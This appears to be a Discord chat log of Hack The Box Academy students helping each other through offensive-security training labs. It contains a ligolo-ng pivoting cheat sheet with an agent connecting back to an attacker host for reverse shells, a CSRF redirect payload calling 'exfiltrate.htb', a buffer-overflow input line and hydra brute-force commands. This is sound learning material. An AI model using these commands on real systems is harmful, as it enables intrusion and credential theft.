when i get home from work ill play aroud with the tunneling exam using ligolo-ng instead

what do you use to write your technical and non-technical documentation?

Usage, Server

sudo ip tuntap add user [your_username] mode tun ligolo
sudo ip link set ligolo up
sudo ip addr show ligolo

./proxy -autocert

Usage, Client

./agent -connect [attcker_ip]:11601

Add network route to access vicitim subnet

sudo ip route add [victim ip-subnet] dev ligolo

Start proxy

start #start tunnel

Now you are able to scan for internal machines and act like the devices are on the same network.

Jumpbox, Connections back from internal victim -> victim -> attack_machine

To do this we go back to our agent-cli and use the following command:

listener_add --addr 0.0.0.0:30000 --to 127.0.0.1:10000 --tcp

damn doesnt seem so bad lol

ligolo-ng cheatsheet if anyone want it

i just try ligolo-ng also, but not yet try in attacking enterprise module
how about double pivoting ?

To do this we go back to our agent-cli and use the following command:

listener_add --addr 0.0.0.0:30000 --to 127.0.0.1:10000 --tcp

then we can host reverse shells on 10000 port

https://www.youtube.com/watch?v=qou7shRlX_s

pretty sweet video

i mean i havent tried any of this its all based on what johnny said

agree just watch it

I am currently following cpts path and I am on active directory enumeration , I find it hard to grasp all that can i skip to next module (web proxies) and do AD after that?

or is it not right to skip it rn

What does without blocking the calling thread mean here? What is calling thread and what does it do?

"calling thread" is the thread/process that executes this function. In the programs you have done you probably only had one thread, the "main" thread, but in programming it is possible to have several "threads" run in parallel and work at the same time. This can be useful if you have some operations that take very long (like reading a file from disk or downloading one), then you can offload these tasks to one thread while the original thread continues doing other work

Is this sharing of workload called multi-threading that we do in programming? I have worked with multi-threading in python to finish a task in a very short time.

yup, and as the name implies multi-threading just means more than one thread. The issue with "blocking" (in your example above) is if you have for example a application that runs a user interface, then the user interface could run on the main thread and as soon as someone presses a button in the UI to download something and the download is also in the main thread but blocking, then the whole UI will freeze until the download is finished. Thats not very userfriendly

Now, let's say the head chef (calling thread) decides that it's time to start baking bread. The head chef initiates the process by calling the baker (another thread) and saying, "Start baking the bread now." In this analogy, the head chef is the calling thread because they are the one initiating a specific task.

Understood. That clears it up mostly. So, in our powershell command, it will download the file in the background I guess and let us use the CLI as well?

That was a great example, thanks a ton.

I am in the metasploit module and I saw this scenario where you are not given permissions to delete stuff. The module goes in a way where you gain higher privileges. so what can we do when we don't have a way to escalate. how do you delete your trace

Any ideas on this?

...

this is more like HTB feedback.

if you have such leftovers in the system and can't delete them then you need to put them in your report (same as any new user accounts you may create) so that they can be cleaned up after your pentesting is over

My head hurts.. damn it..

try different exploit maybe

||https://forum.hackthebox.com/t/academy-linux-privilege-escalation-sudo-user-cannot-run-sudoedit/291676/24|| check the thread

thanks

does spawning target work for everyone

ah. worked. no I just need to figure out how to read the damn thing 🙂

I am still having problems with targets spawning. Does anyone know why this is happening?

i took a break from it and did the rest. Now i need to go back and continue the ad lab

i changed vpn to EU server and it worked

being going through man on || ncdu|| but can't figure out how to read the file. Any hints?

Upstream issues I have heard. Contact support.

almost there try a little bit. read the thread again -x

attacking common services - medium
used subrute i found app.inlanefreight.htb afterwards i tried to zone transfer
then i saw a hint to nmap -p- but when i do that for some reason there is no return
i used nmap a normal scan i found ssh,ftp(2121),dns
i tried to brute force the ftp with hydra
now im brute force ssh with hydra hoping it works
anybody wanna push me to the right track?

Yo

There is a high numbered port that's missed here I believe. One of the services has a wordlist or something

How is this used in the context you were talking about? Is this a method for dropping files with SQLi?

im unable to get a full scan with nmap -p-
so i rushed it with nmap -p- -t5
hoping to get it faster but nothing showed up

Yea its some stupid high number like 35000+

do i have to wait the with just nmap ip -p-?

Is there a firewall?

What other args are you giving

was giving nmap -t5 ip -p-

nope

i gave nmap -sV -T4 -p- {ip}

You sure? Are any ports coming back filtered?

alright i will give it a try

mine took about 2-3 mins

nope when i tested just nmap ip it works fine

try also using -v and --stats-every 5

sV is service detection. --source-port 53 or Pn could help for a quick scan

youll be able to see how long its taking

can i dm so i dont spoil for him

DM me?

yea

Why

.

I don't know what box you guys are talking about 😭 I'm just offering advice

oh nvm then 😭 i dont think flag is visible without sV thats all

I had no issues with sudo nmap -p- ip

This one doesn't have the flag in the version

ah must be a diff one

They've changed this one a few times

Yeah I'm just offering advice.
Sometimes I will just do a quick scan and not service detection if I suspect there to be a high port or if the low ports don't seem to yield anything.
Then I'll banner grab and look for versions based on banners. If I see nothing there, of course I'll have to use nmap for it's good fingerprinting service detection.

This has nothing to do with version info: it's all about enumeration and trying things

Sometimes anonymously

But if you don't know the port then you're sol

💀 my nmap ip -p- finish time is 2hr and it is slowly increasing

You might need to restart the lab and wait a few minutes

Sounds like you might need to change vpn regions then

Connection issue, it shouldn't take 2 hours

im using the pwnbox

Yeah it's tough when them ports are up high and you don't do a comprehensive scan right off the bat.

In HTBA though I would say you should approach the boxes more professionally than you would on a HTB box. In HTBA you can really practice your methodology and in HTB you can try to be a speedy boi.

Changing vpn regions would still affect it

But first try resetting the lab

General question, when I'm on a reverse shell and got creds to another user, and I have no where else to use them (no other services to log into) I'll want to use runas. Unfortunately, the password prompt closing immediately, how can I bypass/overcome it?

well thats great but i dont know how to do it fast or professionally 😭

i will try and change the vpn i reseted the lab a couple of time already

Try relogging into that service with the new creds

I can't relog into the service, it's a rev shell from web application deserialization attack

Wild concept: log into the web app with creds?

That's what practice is for.
HTBA does a great job of describing a penetration testers role in a real engagement.
You have targets in your scope, and you need to make a non destructive comprehensive analysis of any security issues, while documenting what you find to be replicated and reproduced, and then provide simple suggestions on what the client can do to fix it.

Not really a web app, sorry. It's an IIS webserver vulnerable to deserialization attack

I have problem with bypassing basic authentication lab. When I intercept reset request and change GET request to HEAD and forward it I am again prompted to log in. Does anyone had the same issue?

Consider that things are going well right now

It would be very interesting to download this chat and make a model that filters for all problems with boxes and labs and find the solutions people replied to them.

Then use that model to gain a deeper understanding of what people can truly do to move forward with their labs and boxes.
Seems like a big thing that happens is we get a little disoriented; may be on the right path but simply get off track or down a rabbit hole.

Totally agree. I left mentioned section for now and moved on to next ones. Will come back to it after. Meanwhile, if you have any recommendation for it I will appreciate it.

Reread over the lab material. To me it seems like it's working as intended. As I was talking about you may be getting a bit misguided. Thinking you are off track when you may not be.

hmm still dont get it to work...

must be missing something here

thanks no clue why t5 had issues after waiting like 20 min i found the port

Hey Guys! I'm strugling a bit with module "Pivoting, Tunneling and Port Forwarding." I'm looking for extra sources of information regarding this module. Is there any introduction or recommended book to understand this module better? Thank you soo much!

hi there, yet again with linux Privesc module
in the logrotate section, from what i understood, the root should rotate the logs in order to trigger the race condition which logrotten exploitss, but it never rotates and keep stuck on that

Having connection issues here. The US Academy VPN is lagging. EU is too slow for the Pivoting RDP exercise.

Hey anyone completed procedures on the module intro into assembly language Im having bit trouble?

Just did that. make sure to run the payload while you echo som random text in to the log file to trigger a rotation

I believe it's because the T5 argument doesn't allow the nmap socket to connect for long enough to retrieve the banner. Could try going to T4 instead to avoid this issue if you suspect it to be happening.
T3 is default nmap speed if you do not specify the flag explicitly.

I ended up using CA (canada, i believe) low ms

That's pwnbox location, separate from vpn

ah right... sorry

disregard, @twilit plover

Yeah the US VPNs don't let me spawn the target. EU 1 spawns but I think it is so slow that I can't complete the RDP connection in the SOCKS Over RDP section. Will keep trying EU in the meantime.

Like, currently or in general? I was just connected to an rdp session on a US server pwnbox yesterday.

The portion that requires you to proxy all traffic through RDP and connect to the last machine to get the flag. Bandwidth seems to be so bad at that point that the connection drops even after setting mode to Modem 56K

https://tenor.com/view/unicorn-dance-oh-yeah-woot-woot-woot-gif-15618935296991117767

May the odds be ever in your favor

I skipped Double Pivot section after trying for 2 days, will attempt it at last

I am unable to spawn targets in the US either

i am at the skill assesment for the Injection Attacks module. Anyone here to discuss some methodology about xpath injection. i basically can enumerate the xml file but i am struggling with extracting the data.

did so but still

is there someone who has problems with spawning targets or is it just me ?

I had small delays today, but nothing bad

All day yesterday and today. Switched VPNs TCP, UDP... Locations everything.. Targets wont spawn at all.. Trying to open a ticket but been waiting an hour and a half

all these problems probably happen because so many youtubers are recommending HTB and they werent ready for the crazy amount of people on their servers. thats my guess

iam also trying now for hours but it just wont work 😦

You can DM me

maybe

hello, anyone can give me some hint for Attacking Common Applications - Skills Assessment II - What is the admin password to access this application? ?
I already tried to register a new account but i got rejected

Hey, so my dad is gona buy me VIP if I get just more progress in academy so I am doing the basics. :) anyway, I am stuck where it is asking for the htb-student mail location, I tried telling it /var/spool/mail and cat /etc/passwd and the location that returned for mail and none of them are working, what is it wanting here? Here is the exact question, "What is the path to the htb-student's mail?"

env

Just because the folder may not exist doesn't mean that's not where it is

alr ty, for future refference, what does it mean by mail?

Mail. Messages.

Email

huh ok, ty :)

is something wrong with HTB right nmow?

literally this is the right syntax to connect to database

even tried with the sudo command too

capitals?

sql isnt case sensitive

SHOW DATABASE;

it what ... how did I not know that XD

wait this

https://stackoverflow.com/questions/36132063/ignoring-query-to-other-database-command-line

you might need the -uroot it says

I see in the image here that it is just -root

that worked

:)

lmao, no where did it mention uroot in module section

#858470491676737536 ?

is that an error you think?

in fairness, there is an error on HTB site

that's not an error -u <user> to specify the username to use, standard sql cli syntax

-uroot not -u *space * root is that the same?

yea i messed up syntax actually lol

y

my bad entirely,

oh alr ty

Hello everyone! On skills assessment in web attacks moduel i got the user and the token but a cant change the password. It sais access deny. Can someone give me a hint what to do next?

found it 😄

Dumb question, but I'm kinda new.

A lot of metasploit modules just use meterpreter's reverse shell
Which seems to be using my own private IP and not the tun0 IP

How do I get it to not do that?
Do I even need to?

Are you setting lhost to tun0 or it's ip?

yes it should be your tun0 ip, set lhost <ip>

the module in question here doesn't list an lhost as a basic option, is that just something that's universal?

if it's a reverse shell you need to set the lhost properly

you might be restricted through post requests

ah, well 'set LHOST' seems to be valid, even if it's not an option on the module itself so I guess it's just a universal option you can set on all of them.

😉

Depending on the payload selected, the LHOST option might not show up. If you're using a reverse anything payload, it should be there though.

yeah after i wrote i found it myself thx

now i am stuck with xxe

still need help?

yes please

managed to pass that to i just needed to tweak some shit, this thing was not that hard after all

i'm hacking today. 8-)

I am in skills assesment of xxs in cbbh my terminal is showing "Closed without sending a request; it was probably just an unused speculative preconnection" is my script wrong?

nevermind! got it

w00t~!

i'm finally done with the penetration tester modules.

can anyone help me with something? I keep getting an error when i try to open one of the machines (im in the tutorial)

Oh, I finished the getting started module but don't have enough for the next one.
Sadge.

ah yeah i messaged diablo about an hour ago to let him know

Or perhaps they pushed what they believed to be a fix and are asking if your issues have since resolved

no need to publicly bash what you assume to be "nothing happening" when they're probably still trying to fix it

yeah agreee my mistake for crying out loud 😄

it's just been about 9 days or even more so hopefully they can fix the issue in a month

Shit happens, purportedly it's an upstream issue through their hosting provider

yep and that's even worse as it's not really up to them 😦

so they're doing their best. Just doesn't help much on support response times when everyone is messaging support ¯_(ツ)_/¯

👍

Should be quite simple one word answer

the exact name is one of the submodules you did prior to this question

https://academy.hackthebox.com/module/67/section/640
Windows Privilege Escalation -> Credential Hunting -> Search the file system for a file containing a password. Submit the password as your answer.

I found 2 passwords and both incorrect... any hints?

Will say first letter is capitalized

make sure there's not a space

Hey guys, i am a CS student, but my Academic focus is more on hardware. Do you reckon i can just jump into easy ones or should i read up on something in particular first?

I found 3 passwords and still incorrect =/

Working on the Footprinting Lab Medium using the pwnbox. Launched Remmina and I get a popup re: a news feed. I cannot use Remmina without dismissing the popup, and I cannot find a way to do so. Anyone encounter this issue and have a solution?

if you're new to it, I'd definitely recommend the 'getting started' and 'linux fundamentals' modules on academy

alternatively, if you're feeling confident, you can have a crack at the starting point machines and see how you get along

Thank you!

OMG the target finally spawned!!!

Big stuck at AD Enumeration & Attacks - Skills Assessment Part II. In one of the last questions: Submit the contents of the flag.txt file on the Administrator desktop on the DC01 host.

|| I've got CT059 hash, cracked it. I'm trying to run runas /netonly, but I need an interactive shell for that. I have the Administrator hash of MS01.
I'm trying to set up an RDP connection now but that machine performance is giving me hell. ||

did you do something with the GenericAll rights

|| I found CT059 has GenericAll over Domain Admins, yes. ||

yes did you take advantage of that

also your messages have anwers in them, either redact them or put it in spoiler tags

Well I'm trying to... I'm trying to authenticate as that user with /netonly

Working on same box but not encountered any problems as yet

Thanks, fixed that.

you don't need to login locally as that user

What do you mean? I'm trying to add that user to the Domain Admins group... how else could I do it? Can you point me to the right lesson on HTB / give me a nudge?

downtime

hackers

Got it!

can anyone help? I am doing the footprinting medium lab and I have the RDP running. I have the credentials for 'sa' but cant connect to the sql server. If this is normal then fine, i'll try work out what needs changing but if not I may need to reset the box..

run as admin

I did try that but either the sa account pw is not the same as admin or when i type the "@" symbol which is n the password its going through as something else. Thank you though, i'll keep trying

Yeah, its going through as " ' "

probably a keyboard layout issue? see if you can copy it over instead

there isnt a paste option, im just going to open powershell and figure out which key is @

found it. Thank you @next bronze

You can definitely copy/paste lol

Ctrl-c/ctrl-v

Just tried it again, doesnt work... not sure why

I can paste into normal fields but not the admin pw one

I don't think the UAC gui lets you paste the password

hecker

Maybe. But you can always log in as admin

Thats what i did, it was just a keyboard layout problem. My ' and @ got switched round

Ah

Non us-qwerty

yep

I dm'd you. You are going to feel silly but don't. HTB is "tough" sometimes. Let's just put it that way. I bet I spent longer on this than you.

Module: ADVANCED XSS AND CSRF EXPLOITATION
Section: Lab Warmup
Question: Use the lab components to exploit the CSRF vulnerability to get your user promoted to administrator

I am having having troubles making the simulated user to execute CSRF. I'm using the following JS payload, which works when I visit the page, but the simulated user does not seem to do an actual user promotion:

window.location = "http://csrf.vulnerablesite.htb/profile.php?promote=htb-stdnt";

I have tested the same logic to check if the request gets logged, and it does get logged, confirming that the code actually gets executed by the simulated user:

window.location = "http://exfiltrate.htb/test-csrf";

Having a bit of trouble understanding LLMNR poisoning, I understand how to do it and what's happening, but how often is it that a machine will perform a query for LLMNR/NBT-NS? In the lab environment i makes it look like it's always happens but I figure that's not the case in the real world?

So I'm in the Windows Event Logs & Finding evil Modle. and came to the questions "analyzing evil with sysmon and Event logs" the question ask "Replicate the Unmanaged Powershell attack described in this section and provide the SHA256 of clrjit.dll that spoolsv.exe will load as your answer. So I ran the powershell attack, but sysmon logs arent showing any activity for the last like 30+ minutes

i clicked "refresh" on the actions pane, but nothing new loads

tried closing event viewer and reopening it with no success

Help please

My account on Facebook got hacked

We can't help you with that

call mark, we can't help you

Why

Reach out to Facebook support

uhhh

They done nothing

Howdy

We cannot assist you. You must reach out to the facebook support.

Then you're SoL if you can't log back on and change your password

Take it as a lesson not to download/click random shit

are questions like that pretty common in here? lol

At least 5x a week

i just assume they are trolls

Or misinformed/don't know how to read the basic #welcome of any discord

did you kick the guy lol

Nah, but fancy green shield. 😂

Is there anyone here who can tell me why the flag I got on the SQLMap Essentials Table#5 is wrong?

Check for whitespaces.

Did that

Don't want to post what I got here for obvious reasons

Can you dm me?

Hello!

In the module Firewall and IDS evasion hard lab

I'm stucked, is there anyone who can help me with?

I don't understand, why would Microsoft have LLMNR use a users hash? it doesn't really make any sense,

could it be because the DC needs this info? really bizzaire idk how microsoft didn't see the danger

just fk around in the gui, or search up how to write a query to find a specific user

I am getting the following error in HackTheBox academy webpage:
We are currently facing some issues with targets spawning Try switching VPN servers and respawning the targets
I changed VPN servers, but that did not help. Anything I else I can do to fix that?

Just keep trying and changing servers

¯_(ツ)_/¯

sometimes starting other modules will allow u to start the other, but overall I'm getting the same issue, trying to go through ad modules, tried starting others, switching servers ect still wont spawn instance.

Same here. I am in the AD module and I can't spawn any VM even after changing to different VPNs.

yeah really annoying been like this for a few days for me

Hello,

I'm considering the student subscription plan and would like to know: Once my subscription expires, will I still have access to review the modules I've already completed during my subscription period?

as long as the module is completed, you'll have full access to it regardless of plans / subscription expiry

yes

alright, thank you very much

i am done with the academy and only have notes on one computer and the modules have helped me to help other students i know get to the answer when they are really frustrated

the updates on the modules are also free but you have to keep checking to see when they've been updated

yo

I'm stuck on this as well, do you have any tips?

that’s a good module

Thanks friend. I'm not new to programming (like, really not new) but the infosec world is rather spicy haha.
I'll be alright but it's just like development. There's usually the equivalent of a missing semicolon somewhere

how can i close this

Are yall still facing these issues with spawning machines too

try to add the server port in your payload, or actually you can remove all the domain part for redirection in this case that will work.

Yes, windows will do that by default if it can't resolve a name using the DNS server configured at the domain/machine.

Recheck if the sysmon process is running correctly with the specified configuration. It seems to be a problem there

sysmon was running with the correct config. I had to kill the target VM and respawn it to get it to work properly.

yes

anyone know how to remove ingested data from bloodhound?

I would say just restart it :>

What worked for me was to switch the vpn provider (not for the pwnbox) from US to EU. it looks like the US has some issues

When world of Warcraft got ddosed for a little less than a week they gave everyone a free month of subscription

HTB too stingy for that

HTB is a good sponsor of community events and gives away a lot of merch to encourage people to play the CTF and just do CTF in general.

They are not stingy.

Is somebody able to tell me why (when employing the find command) that "*.extension" is different than the same thing without quotations?

I read online it has something to do with the wildcard aspect of * ? I couldn't make much sense of it as a supernoob rn

im using the docker version, even if i restart, it retains

hi, I forgot to cancel my subscription, and HTB academy charged me $490. I don't want to subscribe for 2024, and I want to get the money back. Is there any way that I can get my money back?which email should I send for this question?

It's so fucking hard to find "cancel subscribe button"

how to remove ingested data from bloodhound

clear sessions/databases

"You can either hit "Clear Database" under the Database info tab, or just start a new database by pointing the Neo4j gui to a blank folder. It'll make a completely new database for you in that folder"

where is it

im using the docker version i cant find it

there are three input files here but idk how to remove them

Oh you are using CE. You shoul of mentioned that

I have no idea in CE

they are conflicting and giving wrong results

Just purge the whole db

it says recreating database but was still there :(

reach out to support

Has anyone managed to spawn any lab module boxes? After yesterday, I cannot spawn anything no matter which VPN I switch to. Only EU 1 works, but that too not always.

And it's extremely slow.

I've been facing this since months now.

ahh its so frustrating how do i delete those dbs

What do you need help with? Clearing the Neo4j DB?

Make sure your Docker compose file exposes the Neo4j UI and Neo4j DB ports (they're commented by default), and then after logging in to Neo4j UI, run this query: https://neo4j.com/docs/cypher-manual/current/clauses/delete/#delete-all-nodes-and-relationships

Neo4j default credentials are mentioned in the Docker compose file.

This is for Bloodhound CE. I'm sure the other editions work in the same way.

DM me

Hello! Is everyone having problems with spawning targets?

Footprinting Lab - Hard

How can I find Tom's password?

I found it but the password is not written

Hi everyone,
I'm doing the Intro to Assembly Language, Skills Assessment 1. I am getting constant Traceback errors with python that won't allow me to execute anything when using pwntools. Does anyone know how to fix this?

I have been unable to generate a target machine today, it's crushing🥲

can someone help me with "intro to assembly language skill assessment part 2" i have a code but it is not working

hola

hola

que tal?

well..im new , i want to leren , will you teach me?

@rustic sage ?

Will we find Tom's password with smbwalk?

Solo Ingles, #rules

You should exhaust all tools before asking for help

Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

^

¯_(ツ)_/¯

I found the community name but it doesn't give Tom's password

You gotta use it with a tool to find a password

well i mean smbwalk isnt nessesary. Just easier

The braa command is very succinct as well

The braa syntax they give works wonders

Btw you can't post large blocks of text, you need to link your app.hackthebox.com account to the discord, read #welcome

Second, add ``` before and after large blocks to allow people to read them easier

But I can guarantee that both smbwalk and braa with the string you get from onesixtyone will work

ah true braa is a tool. Thaught it was a compiling tool for some sick reason lol

Lol yeah the output from braa is waaaaay shorter

@fathom pendant is it true that TGT pre-auth must be disabled for a kerberoasting attack?

idk if you know you know

¯_(ツ)_/¯

😄

never mind, Kerberoasting is based on useraccounts and passwords but the AS-REP is (possibly) vulnerble if pre-auth is disabled because of timestamp encryption issues

https://luemmelsec.github.io/Kerberoasting-VS-AS-REP-Roasting/

Are the SSH prompts for target boxes super laggy for anyone else? It literally takes seconds to respond to writing commands, let alone executing them.

@vivid igloo ask here, my dms aren't open

reinstall pwm tools, also what error

Hello everyone ... im stuck on Password Mutations inside the Password Attacks module.
the question states: Create a mutated wordlist using the files in the ZIP file under "Resources" in the top right corner of this section. Use this wordlist to brute force the password for the user "sam".
I know the machine is running a couple of stuff ... so what i tried until now is after mutating the password.list with custom.rule i ran crackmapexec on smb and hydra on ssh with no results after at least an hour of running.
Do u guys have any tips ?

PS: i used hashcat to mutate the list

Don't attack ssh

Ftp should also be open, and you can increase threads with hydra

hey so i was doing a bug bounty and in a certain request i modified a prem in the request and am getting a 500 internal server error

thats a bug right

@fathom pendant

@fathom pendant Thank you 🙂

Don't ping me

ok

Ah this has nothing to do with academy, read #welcome to find out how to access more of the server

ok

Hello I don't know to use Aquatone can you help me plz?

You need to supply it with a site or ip I believe

The module that refers to it should give you the syntax

Or aquatone -h?

in web proxies between zap and burp do we have to use 1 of them or both

coz i am comfortable with burp

Unfortunately there isn't much info in the module.

You should be able to throw a site at it

with what kind of url?

Any? Idk I didn't really use it, it's clunky

For example, but this url it is not okay ^^"

And the question I test all 3 words in this page it is not okay

you clearly haven't tested all of them

it's the most obvious one

What is a header

You mistyped one

Also make sure you don't have extra spaces

Message support then dude

If you believe it's a technical error not letting you pass it

What module/section is this?

Yes I do I wait

ATTACKING COMMON APPLICATIONS

Application Discovery & Enumeration

Maybe it's expecting Of to be capitalized

are you sure there's not an extra space at the end

nope ^^"

yes

I find finaly thanks

Aquatone it is not complicated

Hey ... I'm sorry to bother u again ... im almost on password 30000 on the mutated password list with no hits, i raised hydra to t 32 and let it lose on ftp as advised.
those are the only ports i can see open on the machine ... 21, 22, 139 and 445. i attacked smb and ssh (stopped attacking after MarcielLee's advice) and now ftp.
a -nP -p- scan doesnt give results back after 15 minutes so i dont believe there is a port beyond the standard search.

It should work just fine

smb you might need to add --local-auth

For cme

okay thanx again ... i will try that 🙂

try a valid answer

i cant ssh or rdp to amy target..anyone experiencing the same?

attacking common applications - osTicket.

a huge skill issue apparently. i have the password i believe but the user to log in with i just can't find

change VPN server and respawn the target

theres a big banner stating that on the website already

omg that worked tysm i was pulling my hair

you can just remove the container, don't even need to login to neo4j

docker container ls
# find the container that ends with "graph-db-1"
docker container rm <that container>
docker volume rm $(docker volume ls -q | grep neo4j-data)

i tried removing all containers but it still retained

but i didnt remove volume i see

For the password attack modules: Create a mutated wordlist using the files in the ZIP file under "Resources" in the top right corner of this section. Use this wordlist to brute force the password for the user "sam". Once successful, log in with SSH and submit the contents of the flag.txt file as your answer.

How long is this supposed to take?

Ive made a mutated wordlist using hashcat and im using hydra to login as sam for ssh

the estimated time is 19 hours

Do I really wait here for 19 hours? Ive been waiting for about 30 minutes

nope

its not 19 years but might be 1

Is that for real

I gotta wait an hour x-x

Ur doing something wrong

thats what im thinking

nah it takes a very long time. But try splitting that mutated list into different b-word,c-words ect

i turned up hydra to t 64 to

run multiple instances?

to cut my time or something

no, just split the words and you can sort out that list

ect

so like if you tried all a words, you can try the b list. Also run the attack against ftp and not ssh

what do you mean?

by sort

oh, the question said login with ssh so I assumed to use ssh

password reuse

just split up the list so it doesnt take so long. its going to take a loooong time untill it hits the z words and ect

does hydra not let me know found credentials as its runnning..? or does it wait until the end to say it

Otherwise i dont get what difference it would make splitting it up if its just going to go through all the same words

i mean yes

password reuse..?

Sometimes people have the same password for multiple services no?

Unsafe practice but exists

aah thats what you meant. I thought you were implying that it was going to be the same unmutated passwords as before lol

Haha oh no sorry

Ssh is notoriously slow to brute-force

I do remember that module does take a while but not 19 hours lol

this

yeah thats a mb because i didnt scan the service for anything else, i just assumed to use ssh since the question asked for it

you have like a list of the fastest to slowest things to brute force?

or a quick rundown from memory

just something to always keep in mind! No worries, ftp is much faster to brute force

F

It says to log in with ssh to get the flag, but that doesn't mean you have to brute force that service specifically, there's more things running on the box

yeah i tunnel visioned

this command is right though right: hydra -l "sam" -P plist.list -t 64 ftp://IP

Don't have a list, ssh is just super slow, FTP is quite fast, smb and rdp are somewhere in between, just observation

yeah make use of whatever is running, but kerberos/ldap is usually the fastest then http/s, rdp and ssh are some of the slowest

thats a good enough list for me.. just something for me to keep in mind

isn't rdp pretty slow or am I remembering wrong, but you don't usually brute rdp

Oh yeah, Kerberos, right, kerbrute goes brrr

It's slow, I think not ssh slow, but I could be misremembering too

yeah usually there's no reason to brute it outside of trying one or two common ones

Hi guys, I need some guidance, if you can help me. I'm stuck on the "Passwd, Shadow & Opasswd" lab for the Password attacks module.
I've been trying for days to find Will's password, I used the resources provided for the lab, mutated the password and used the custom rule provided, tried the password list generated on the ftp and Smb services that are open on the target, but the password cannot be found. Can someone hint me where I'm doing wrong?

Pretty much, I check for RDP after I have creds generally

rdp and winrm for sure haha

is here only Pc or too Android ?

You could probably try academy from android yes. External keyboard would be helpful and it's probably a bit painful.

Can someone tell me where can i ask for help for buffer overflow

Nice

how make a Mod Menu on Android Phone for Games ?

run $(python -c "print('\x55' * 786 + '\x90' * 100 + '\x44' * 150 + '\x66' * 4)")

after inserting the following payload, I should have the value in the EIP 0x66666666 but I continue to have 0x44444444, it is in the buffer stack overflow module
can someone help me

That's not really in scope for this channel. 🤷‍♀️

I logged in with imap, but I cannot receive messages, it gives an error.

Imap requires a prefix

I haven't done that module but presumably from the output, your offsets are off.

<literally anything> <command> <argument>

is the same as the example but i added the () of the print but is wrong even if i paste the example one

Read the purpose of this channel, and more widely this server

#welcome

See my Name

I,m Game Hacker

This isn't relevant to the channel, reading comprehension is a requirement

It could be the example isn't accurate then.

Then how did you get here

@vivid mica use this channel appropriately or the permission to speak here will be removed

Ok

it works from the ssh test but it is not working from my vm, i think becouse from the ssh the gbd is (gbd) and from my vm is gef

Yeah. Environment changed so the offsets did too.

aslr is disabled for the target

but it shouldn't be the same?

@next bronze @haughty stirrup Forgot to say, thanks for the help I got it

Not necessarily nope. Different protections can be enabled on systems and just changing from GDB to not GDB for example while shift things slightly. Usually not a huge amount but a little bit.

ty so much

gef is just a plugin for gdb btw, so that shouldn't change anything

running on a different machine with aslr enabled would though

1 FETCH BODY[] ?

You still need to specify which item you're getting the body[] from

why cant i use dcsync?

i gave myself the rights but still it says access denied

Force gpupdate

Anybody super familiar with DNS enum using gobuster? I’m working on the ||Devvortex|| box which I know has an exposed subdomain but no matter which SecList subdomain wordlist I use it’s not finding anything

#boxes , read and follow #welcome

Hi, I'm working on the module Introduction to Windows Command Line and I don't understand how the answer to this question is not ||PackageManagement||

Reading the section should give you the answer

AD Begginer -> what ACL should i write i dont know how to find it

@solid python

DCSync

i added it but dcsync still gives me error

<@&861185840277487616>

AD module was easier than this documenting and reporting lmao

Make sure you're in the right user context

yes i am

i think the policy is not updated on the DC maybe

What module is this?

documenting and reportinhg

Did you do the privilege::debug?

i dont have debug privilege

and i think we dont need it

Did you sign out and sign back in?

yes

it is not DC tho

can anyone tell me why this is not working, when clearly the target is below and I am trying to nmap it?

Try changing vpn regions and respawning target

Did you try it with the -Pn like the error says?

the apt command mentioned in the module isn't working the parrot guys arent supporting. I tried the pipx way mentioned in their installation wiki but it isn't working any idea

use netexec https://www.netexec.wiki/getting-started/installation/installation-on-unix

I tried building from source but it is just taking a lot of time

same but better

thank you! switched to US vpn, now it works. The problem is that it still doesn't work on my kali VM, even though I am connected to the VPN 😄

Yay! Small module, but it's a win!

Did you try sudo apt install cme? That installs crackmapexec which you can launch as cme.

Just download netexec and use nxc instead

Don't run pwnbox and vpn simultaneously

installing python packages with apt is not ideal as well. pip and pipx are designed for that

Anyone able to provide a sanity check/nudge for ADVANCED SQL INJECTIONS - Skills Assessment
(https://academy.hackthebox.com/module/188/section/2004)
||Have done a code review to find the vulnerable API and have a small proof of concept one liner to display boolean injection||

Hey Everyone! I’m currently enrolled in the SOC Analyst Path and I am in the Splunk Fundamentals module. I’m in the Intrusion Detection With Splunk section and I’m literally stuck in 1 question.
“Navigate to http://[Target IP]:8000, open the “Search & Reporting” application and find through an SPL search against all data any suspicious loads of Clr.dll that could indicate a C# injection/execute-assembly attack. Then, again through SPL searches, find if any of the suspicious processes that were returned in the first place were used to temporarily execute code. Enter its name as your answer. Answer format:_exe”
If anyone has solved this and could give me an idea, that would be great.

I did this but the syntax is weird. nxe works like charm though

hello,
is there any workaround for the bad remote desktop to the target machine ?

i am using xfreerdp and tryed mrd and it is same . all connection get cut after secounds

use tcp for vpn

I would recommend doing a basic search for the keyword clr.dll | stats count by ProcessName ParentProcessName so you can sort by related process the exact query doesnt have the right syntax but you should get the idea. One more thing you can do here is research common processes that are used to execute malicious code as the answer to this question is something you will surely get used to seeing.

even though its terminated, I still canot nmap it on the kali VM.. I think I cant connect to the VPN for some reason..

There have been issues

You downloaded a new vpn after changing it for pwnbox yeah?

yes, I have. The US-1 vpn file

Just making sure, bc I've done that before lol

hey I don't find this answer but I do that there is in the module ATTACKING COMMON APPLICATIONS Attacking WordPress

Why not check /home/

But also I do see a user in your screenshot

I am in the mainframe.

but still its super strange, since it says im connected to the vpn, and my IP doesn't change..

Ah it's arbitrary file-read

webadmin et mrb3n

look for wordpress users, not system users

how?

Ohhh that makes way more sense

$Webroot/wp-users/ or something like that yeah?

can't remember off the top of my head but yeah

Woah the website finally now offers a visual warning when they expect their servers to have problems spawning targets! It shows up at the top of the screen in a red bar for those wondering.

There used to be a way to find wpusers with ?author=0, or ?author=1.

Does anybody remember that?

this?

No

$webroot was my way of saying whatever backend service webroot is

use wpscan

They just added it

It happens to be misleading because I spawned pwnbox and the target. I'll take the victory. 0 packet loss.

It's not misleading bc other users are experiencing issues lol

I get it. Just saying that because before I would have issues when I didn't expect to but now this time I expected to and then didn't.

anyone has idea why after supposedly being connected to the VPN on Kali VM, it still doesn't change my IP?

Are you looking at the correct interface?

In my case, I don't use my wlan0 interface, or in other cases perhaps my eth0 interface. Instead, to connect to HTB I would use my tun0 interface.

Your ip won't change, its a split tunnel - not a traffic redirect

looking at tun0, but it remains the same

Try using the tun0 address.

Your tun0 if you're only running the htb vpn will be like 10.10.x.x

If you're using other tunnel vpns then it'll be whatever tunX that was set when you ran it

well mine is 10.10.16.66

I am trying to scan this

so I just nmap this target and just remains blank

That's probably because nmap is using your wlan0 or eth0 address by default.

I use but I have not users

Probably an error log will show

Also if you have multiple htb vpns running that can also be a reason

I restarted the machine but didn't help

